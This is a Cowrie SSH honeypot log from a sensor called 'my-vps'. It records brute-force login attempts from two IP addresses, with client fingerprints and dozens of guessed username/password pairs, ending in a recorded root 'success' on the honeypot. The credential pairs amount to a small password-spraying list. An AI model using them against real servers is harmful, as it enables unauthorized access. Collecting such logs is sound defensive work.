{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:50:36.439723Z","src_ip":"212.227.125.160","session":"64471be0ddd7"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:50:36.513945Z","src_ip":"212.227.125.160","session":"64471be0ddd7"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"!QAZ@wsx","message":"login attempt [oracle/!QAZ@wsx] failed","sensor":"my-vps","timestamp":"2025-08-31T00:50:36.746987Z","src_ip":"212.227.125.160","session":"64471be0ddd7"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:50:37.901946Z","src_ip":"212.227.125.160","session":"64471be0ddd7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56956,"dst_ip":"1.2.3.4","dst_port":22,"session":"f19aeb105688","protocol":"ssh","message":"New connection: 212.227.125.160:56956 (1.2.3.4:22) [session: f19aeb105688]","sensor":"my-vps","timestamp":"2025-08-31T00:50:46.816278Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:50:46.817162Z","src_ip":"212.227.125.160","session":"f19aeb105688"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:50:46.889788Z","src_ip":"212.227.125.160","session":"f19aeb105688"}
{"eventid":"cowrie.login.failed","username":"plex","password":"plex","message":"login attempt [plex/plex] failed","sensor":"my-vps","timestamp":"2025-08-31T00:50:47.110949Z","src_ip":"212.227.125.160","session":"f19aeb105688"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":17226,"dst_ip":"1.2.3.4","dst_port":22,"session":"389ae9f2758c","protocol":"ssh","message":"New connection: 212.227.235.229:17226 (1.2.3.4:22) [session: 389ae9f2758c]","sensor":"my-vps","timestamp":"2025-08-31T00:50:48.045712Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-31T00:50:48.046985Z","src_ip":"212.227.235.229","session":"389ae9f2758c"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-31T00:50:48.173887Z","src_ip":"212.227.235.229","session":"389ae9f2758c"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:50:48.230615Z","src_ip":"212.227.125.160","session":"f19aeb105688"}
{"eventid":"cowrie.login.failed","username":"admin","password":"topo133","message":"login attempt [admin/topo133] failed","sensor":"my-vps","timestamp":"2025-08-31T00:50:48.762349Z","src_ip":"212.227.235.229","session":"389ae9f2758c"}
{"eventid":"cowrie.login.failed","username":"admin","password":"0l0ctyQh243O63uD","message":"login attempt [admin/0l0ctyQh243O63uD] failed","sensor":"my-vps","timestamp":"2025-08-31T00:50:49.891740Z","src_ip":"212.227.235.229","session":"389ae9f2758c"}
{"eventid":"cowrie.login.failed","username":"admin","password":"1qaz@WSX3edc","message":"login attempt [admin/1qaz@WSX3edc] failed","sensor":"my-vps","timestamp":"2025-08-31T00:50:51.022595Z","src_ip":"212.227.235.229","session":"389ae9f2758c"}
{"eventid":"cowrie.login.failed","username":"admin","password":"1111","message":"login attempt [admin/1111] failed","sensor":"my-vps","timestamp":"2025-08-31T00:50:52.151910Z","src_ip":"212.227.235.229","session":"389ae9f2758c"}
{"eventid":"cowrie.login.failed","username":"admin","password":"system","message":"login attempt [admin/system] failed","sensor":"my-vps","timestamp":"2025-08-31T00:50:53.280521Z","src_ip":"212.227.235.229","session":"389ae9f2758c"}
{"eventid":"cowrie.session.closed","duration":"6.4","message":"Connection lost after 6.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:50:54.426511Z","src_ip":"212.227.235.229","session":"389ae9f2758c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41378,"dst_ip":"1.2.3.4","dst_port":22,"session":"56048a597a29","protocol":"ssh","message":"New connection: 212.227.125.160:41378 (1.2.3.4:22) [session: 56048a597a29]","sensor":"my-vps","timestamp":"2025-08-31T00:50:57.293698Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:50:57.294749Z","src_ip":"212.227.125.160","session":"56048a597a29"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:50:57.368191Z","src_ip":"212.227.125.160","session":"56048a597a29"}
{"eventid":"cowrie.login.failed","username":"steam","password":"123456","message":"login attempt [steam/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T00:50:57.604088Z","src_ip":"212.227.125.160","session":"56048a597a29"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:50:58.772182Z","src_ip":"212.227.125.160","session":"56048a597a29"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45078,"dst_ip":"1.2.3.4","dst_port":22,"session":"42db02ddde09","protocol":"ssh","message":"New connection: 212.227.125.160:45078 (1.2.3.4:22) [session: 42db02ddde09]","sensor":"my-vps","timestamp":"2025-08-31T00:51:07.592979Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:51:07.593873Z","src_ip":"212.227.125.160","session":"42db02ddde09"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:51:07.672977Z","src_ip":"212.227.125.160","session":"42db02ddde09"}
{"eventid":"cowrie.login.failed","username":"esuser","password":"esuser","message":"login attempt [esuser/esuser] failed","sensor":"my-vps","timestamp":"2025-08-31T00:51:07.903772Z","src_ip":"212.227.125.160","session":"42db02ddde09"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:51:09.028444Z","src_ip":"212.227.125.160","session":"42db02ddde09"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47832,"dst_ip":"1.2.3.4","dst_port":22,"session":"cdc36383b875","protocol":"ssh","message":"New connection: 212.227.235.229:47832 (1.2.3.4:22) [session: cdc36383b875]","sensor":"my-vps","timestamp":"2025-08-31T00:51:09.199513Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:51:10.191990Z","src_ip":"212.227.235.229","session":"cdc36383b875"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T00:51:10.192711Z","src_ip":"212.227.235.229","session":"cdc36383b875"}
{"eventid":"cowrie.login.failed","username":"daemon","password":"P@ssw0rd123","message":"login attempt [daemon/P@ssw0rd123] failed","sensor":"my-vps","timestamp":"2025-08-31T00:51:16.129449Z","src_ip":"212.227.235.229","session":"cdc36383b875"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42606,"dst_ip":"1.2.3.4","dst_port":22,"session":"97e45f77e424","protocol":"ssh","message":"New connection: 212.227.125.160:42606 (1.2.3.4:22) [session: 97e45f77e424]","sensor":"my-vps","timestamp":"2025-08-31T00:51:17.973641Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:51:17.974649Z","src_ip":"212.227.125.160","session":"97e45f77e424"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:51:18.052653Z","src_ip":"212.227.125.160","session":"97e45f77e424"}
{"eventid":"cowrie.session.closed","duration":"9.0","message":"Connection lost after 9.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:51:18.217736Z","src_ip":"212.227.235.229","session":"cdc36383b875"}
{"eventid":"cowrie.login.failed","username":"observer","password":"observer","message":"login attempt [observer/observer] failed","sensor":"my-vps","timestamp":"2025-08-31T00:51:18.273268Z","src_ip":"212.227.125.160","session":"97e45f77e424"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:51:19.364259Z","src_ip":"212.227.125.160","session":"97e45f77e424"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43842,"dst_ip":"1.2.3.4","dst_port":22,"session":"f5a689a2ae23","protocol":"ssh","message":"New connection: 212.227.235.229:43842 (1.2.3.4:22) [session: f5a689a2ae23]","sensor":"my-vps","timestamp":"2025-08-31T00:51:21.359919Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T00:51:21.360595Z","src_ip":"212.227.235.229","session":"f5a689a2ae23"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T00:51:21.427930Z","src_ip":"212.227.235.229","session":"f5a689a2ae23"}
{"eventid":"cowrie.login.failed","username":"shadow","password":"123shadow123","message":"login attempt [shadow/123shadow123] failed","sensor":"my-vps","timestamp":"2025-08-31T00:51:21.738375Z","src_ip":"212.227.235.229","session":"f5a689a2ae23"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:51:22.807177Z","src_ip":"212.227.235.229","session":"f5a689a2ae23"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55484,"dst_ip":"1.2.3.4","dst_port":22,"session":"98a34db224e3","protocol":"ssh","message":"New connection: 212.227.125.160:55484 (1.2.3.4:22) [session: 98a34db224e3]","sensor":"my-vps","timestamp":"2025-08-31T00:51:28.444057Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:51:28.445057Z","src_ip":"212.227.125.160","session":"98a34db224e3"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:51:28.518537Z","src_ip":"212.227.125.160","session":"98a34db224e3"}
{"eventid":"cowrie.login.failed","username":"docker","password":"docker","message":"login attempt [docker/docker] failed","sensor":"my-vps","timestamp":"2025-08-31T00:51:28.752984Z","src_ip":"212.227.125.160","session":"98a34db224e3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48696,"dst_ip":"1.2.3.4","dst_port":22,"session":"c428c84f7acc","protocol":"ssh","message":"New connection: 212.227.235.229:48696 (1.2.3.4:22) [session: c428c84f7acc]","sensor":"my-vps","timestamp":"2025-08-31T00:51:29.036613Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T00:51:29.043799Z","src_ip":"212.227.235.229","session":"c428c84f7acc"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T00:51:29.282399Z","src_ip":"212.227.235.229","session":"c428c84f7acc"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:51:29.913876Z","src_ip":"212.227.125.160","session":"98a34db224e3"}
{"eventid":"cowrie.login.success","username":"root","password":"Aq1sw2de3","message":"login attempt [root/Aq1sw2de3] succeeded","sensor":"my-vps","timestamp":"2025-08-31T00:51:30.243369Z","src_ip":"212.227.235.229","session":"c428c84f7acc"}
